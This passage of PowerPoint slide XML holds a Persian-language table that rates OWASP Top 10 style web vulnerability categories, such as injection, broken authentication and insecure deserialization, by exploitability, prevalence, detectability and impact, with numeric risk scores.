                      <a:endParaRPr lang="en-US" sz="1700" b="1" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                        <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2"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fa-IR" sz="1000" b="1" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>امتیاز</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1000" b="1" dirty="0">
                        <a:solidFill>
                          <a:srgbClr val="000000"/>
                        </a:solidFill>
                        <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>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r>
                        <a:rPr lang="en-US" sz="1800" dirty="0">
                          <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                        </a:rPr>
                        <a:t/>
                      </a:r>
                      <a:br>
                        <a:rPr lang="en-US" sz="1800" dirty="0">
                          <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                        </a:rPr>
                      </a:br>
                      <a:r>
                        <a:rPr lang="fa-IR" sz="900" b="1" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>تزریق</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fa-IR" sz="800" b="1" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>مختص برنامه کاربردی</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fa-IR" sz="900" b="1" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="bg1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>ساده: ۳</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fa-IR" sz="900" b="1" baseline="0" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>عمومی: ۲</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900" b="1" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="bg1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>ساده: ۳</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fa-IR" sz="900" b="1" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="bg1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>شدید: ۳</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="10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fa-IR" sz="800" b="1" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>مختص برنامه کاربردی</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fa-IR" sz="900" b="1" dirty="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>8.0</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="900" b="1"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1"/>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t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fa-IR" sz="900" b="1" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>احراز هویت </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fa-IR" sz="800" b="1" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>مختص برنامه کاربردی</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fa-IR" sz="900" b="1" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="bg1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>ساده: ۳</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fa-IR" sz="900" b="1" baseline="0" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>عمومی: ۲</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900" b="1" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>متوسط</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fa-IR" sz="900" b="1" baseline="0" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>: ۲</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900" b="1" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="bg1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>شدید: ۳</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fa-IR" sz="800" b="1" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>مختص برنامه کاربردی</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r>
                        <a:rPr lang="en-US" sz="1800" dirty="0">
                          <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                        </a:rPr>
                        <a:t/>
                      </a:r>
                      <a:br>
                        <a:rPr lang="en-US" sz="1800" dirty="0">
                          <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                        </a:rPr>
                      </a:br>
                      <a:r>
                        <a:rPr lang="fa-IR" sz="900" b="1" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>افشای اطلاعات حساس</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fa-IR" sz="800" b="1" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>مختص برنامه کاربردی</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fa-IR" sz="900" b="1" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>متوسط</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fa-IR" sz="900" b="1" baseline="0" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>: ۲</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900" b="1" baseline="0" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="bg1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>شایع: ۳</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1200" b="1" baseline="0" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="bg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fa-IR" sz="900" b="1" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>متوسط</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fa-IR" sz="900" b="1" baseline="0" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>: ۲</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900" b="1" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="bg1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>شدید: ۳</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fa-IR" sz="800" b="1" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>مختص برنامه کاربردی</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rgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="+mn-ea"/>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3"/>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fa-IR" sz="800" b="1" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>مختص برنامه کاربردی</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fa-IR" sz="900" b="1" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>متوسط</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fa-IR" sz="900" b="1" baseline="0" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>: ۲</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900" b="1" baseline="0" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>عمومی: ۲</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900" b="1" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="bg1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>ساده: ۳</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fa-IR" sz="900" b="1" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="bg1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>شدید: ۳</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fa-IR" sz="800" b="1" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>مختص برنامه کاربردی</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4"/>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a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fa-IR" sz="900" b="1" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>کنترل دسترسی ناقص </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fa-IR" sz="800" b="1" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>مختص برنامه کاربردی</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="800" b="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fa-IR" sz="900" b="1" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>متوسط</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fa-IR" sz="900" b="1" baseline="0" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>: ۲</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900" b="1" baseline="0" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>عمومی: ۲</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900" b="1" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>متوسط</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fa-IR" sz="900" b="1" baseline="0" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>: ۲</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900" b="1" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="bg1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>شدید: ۳</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fa-IR" sz="800" b="1" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>مختص برنامه کاربردی</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="800" b="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chemeClr val="dk1"/>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a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fa-IR" sz="900" b="1" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> تنظیمات امنیتی اشتباه </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fa-IR" sz="800" b="1" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>مختص برنامه کاربردی</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fa-IR" sz="900" b="1" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="bg1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>ساده: ۳</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fa-IR" sz="900" b="1" baseline="0" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="bg1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>شایع: ۳</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fa-IR" sz="900" b="1" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="bg1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>ساده: ۳</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fa-IR" sz="900" b="1" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>متعادل: ۲</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fa-IR" sz="800" b="1" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>مختص برنامه کاربردی</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6"/>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fa-IR" sz="800" b="1" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>مختص برنامه کاربردی</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fa-IR" sz="900" b="1" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="bg1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>ساده: ۳</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fa-IR" sz="900" b="1" baseline="0" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="bg1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>شایع: ۳</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fa-IR" sz="900" b="1" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="bg1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>ساده: ۳</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fa-IR" sz="900" b="1" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>متعادل: ۲</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fa-IR" sz="800" b="1" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>مختص برنامه کاربردی</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7"/>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a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fa-IR" sz="900" b="1" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>دیسریالایز نا امن </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fa-IR" sz="800" b="1" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>مختص برنامه کاربردی</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fa-IR" sz="900" b="1" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>سخت</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fa-IR" sz="900" b="1" baseline="0" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>: ۱</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fa-IR" sz="900" b="1" baseline="0" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>عمومی: ۲</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900" b="1" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>متوسط</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fa-IR" sz="900" b="1" baseline="0" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>: ۲</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900" b="1" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="bg1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>شدید: ۳</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fa-IR" sz="800" b="1" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>مختص برنامه کاربردی</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a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>5.0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8"/>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fa-IR" sz="900" b="1" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>کامپوننت های آسیب پذیر </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fa-IR" sz="800" b="1" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>مختص برنامه کاربردی</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fa-IR" sz="900" b="1" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>متوسط</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fa-IR" sz="900" b="1" baseline="0" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>: ۲</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900" b="1" baseline="0" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="bg1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>شایع: ۳</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fa-IR" sz="900" b="1" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>متوسط</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fa-IR" sz="900" b="1" baseline="0" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>: ۲</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900" b="1" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>متعادل: ۲</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fa-IR" sz="800" b="1" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>مختص برنامه کاربردی</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rgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>4.7</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9"/>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a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fa-IR" sz="900" b="1" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
